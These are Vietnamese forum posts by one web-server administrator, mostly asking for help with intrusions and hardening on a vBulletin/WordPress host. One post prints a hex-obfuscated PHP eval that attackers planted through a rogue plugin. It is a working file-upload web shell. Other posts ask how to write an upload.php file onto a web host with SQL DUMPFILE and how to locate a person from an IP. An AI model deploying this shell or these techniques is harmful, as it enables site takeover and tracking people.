Messages posted by: quantri.kdh

Mình mình chạy webserver

Cài LAMP và 1 số công cụ khác cho vbb và wp thui

Em đang kiểm tra số lượng kết nối từ mỗi IP bằng lệnh
Code:

watch "netstat -an | grep ':80' | awk '{print \$5}' | sed s/'::ffff:'// | cut -d\":\" -f1 | sort | uniq -c"

Và cho ra kết quả : http://3.bp.blogspot.com/-zq22ZdeQUhI/U60sk7ekF4I/AAAAAAAAMAU/2LsKWYFY-f8/s1600/vps.png

Cho em hỏi có 1 số IP có số lượng kết nối gần cả trăm thì có phải đang bị tấn công hay gì không?

Thank smilie

Mình đang cần 1 số tài liệu về thâm nhập và bảo mật trong mạng không dây ( chủ yếu là bảo mật), bạn nào có cho mình xin vơi nhé smilie

Tbanks!!!

Hiện tại site em đang có một số kẻ phá hoại, không biết chúng dùng cách gì mà mỗi khi member click vào một box trên diễn đàn nó sẻ tới trang Login, yêu cầu đăng nhập
Còn admin khi click vào sẽ chuyển đến trang Plugin và Add một Plugin mới với Shellcode bên trong có nội dung bên dưới

Mong được ace giúp đỡ, nguyên nhân và cách khắc phục

Cảm ơn!

Code:

eval("\x20\x69\x66\x20\x28\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x27\x64\x6f\x27\x5d\x3d\x3d\x27\x6c\x6f\x61\x64\x27\x29\x7b\xd\xa\x20\x24\x66\x69\x6c\x65\x73\x20\x3d\x20\x40\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x66\x69\x6c\x65\x73\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x20\x21\x3d\x20\x27\x27\x29\x7b\xd\xa\x20\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x20\x3d\x20\x24\x5f\x52\x45\x51\x55\x45\x53\x54\x5b\x22\x70\x61\x74\x68\x22\x5d\x2e\x24\x66\x69\x6c\x65\x73\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x3b\xd\xa\x20\x69\x66\x28\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x66\x69\x6c\x65\x73\x5b\x27\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x27\x5d\x2c\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x29\x29\x20\x65\x63\x68\x6f\x20\x22\x3c\x68\x31\x3e\x3c\x61\x20\x68\x72\x65\x66\x3d\x27\x24\x66\x75\x6c\x6c\x70\x61\x74\x68\x27\x3e\x4f\x4b\x2d\x43\x6c\x69\x63\x6b\x20\x68\x65\x72\x65\x21\x3c\x2f\x61\x3e\x3c\x2f\x68\x31\x3e\x22\x3b\xd\xa\x20\x7d\xd\xa\x20\x64\x69\x65\x28\x27\x3c\x66\x6f\x72\x6d\x20\x6d\x65\x74\x68\x6f\x64\x3d\x50\x4f\x53\x54\x20\x65\x6e\x63\x74\x79\x70\x65\x3d\x22\x6d\x75\x6c\x74\x69\x70\x61\x72\x74\x2f\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x22\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x74\x65\x78\x74\x20\x6e\x61\x6d\x65\x3d\x70\x61\x74\x68\x3e\xd\xa\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x65\x22\x20\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x73\x22\x3e\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\x65\x3d\x73\x75\x62\x6d\x69\x74\x20\x76\x61\x6c\x75\x65\x3d\x22\x55\x70\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e\x27\x29\x3b\xd\xa\x20\x7d\xd\xa");

Cảm ơn thientm
Mình cũng đang chmod thành 600 cho những file quan trọng, còn vấn đề nào tăng tính bảo mật mong mấy huynh chỉ giáo thêm smilie

Chào mọi người!
Để hạn chế hack local thì chúng ta có thể dùng một số biện pháp trong đó có việc di chuyển, đổi tên và chmod file config.php , nhưng theo mình thì file config.php có thể thăm dò từ file clas_core.php . vậy chúng ta có nên bảo vệ file class_core này giống file config ko? nếu ta chomd giống file config thành 600 hay 400 ( Direct Admin) thì có ảnh hưởng gì không?

Thank mọi người!

em muốn upfile lên host bằng Mysql dumper,
và up được lên localhost bằng lệnh
SELECT * INTO DUMPFILE ' C:/xampp/htdocs/forum/upload.php' from test

nhưng giờ em muốn up fiel lên web thì là sao

Có phải dùng lệnh này không? hay lệnh khác???
SELECT * INTO DUMPFILE ' http://domain/upload.php' from test;

mấy huynh giúp em nhé
thank!

Mình muốn biết thông tin của môt người với một địa chỉ Ip đã biết
vậy có cách nào để xác đinh ngườig đó ở đâu( tại đâu trong tỉnh )

mình chỉ biết IP đó dùng mạng VPN,online bằng trình duyệt nào và vào thời gian nào thôi

Huynh nào giúp mình với, thank nhiều!

Chào các bạn!
không biết từ đâu trên host mình có file .dat ? trong file có dòng số (VD: 2342394249596) mình đã xoá file này nhưng cũng tạo lại

Ai biết vì sao giải thích giùm mình với nhé. thanks!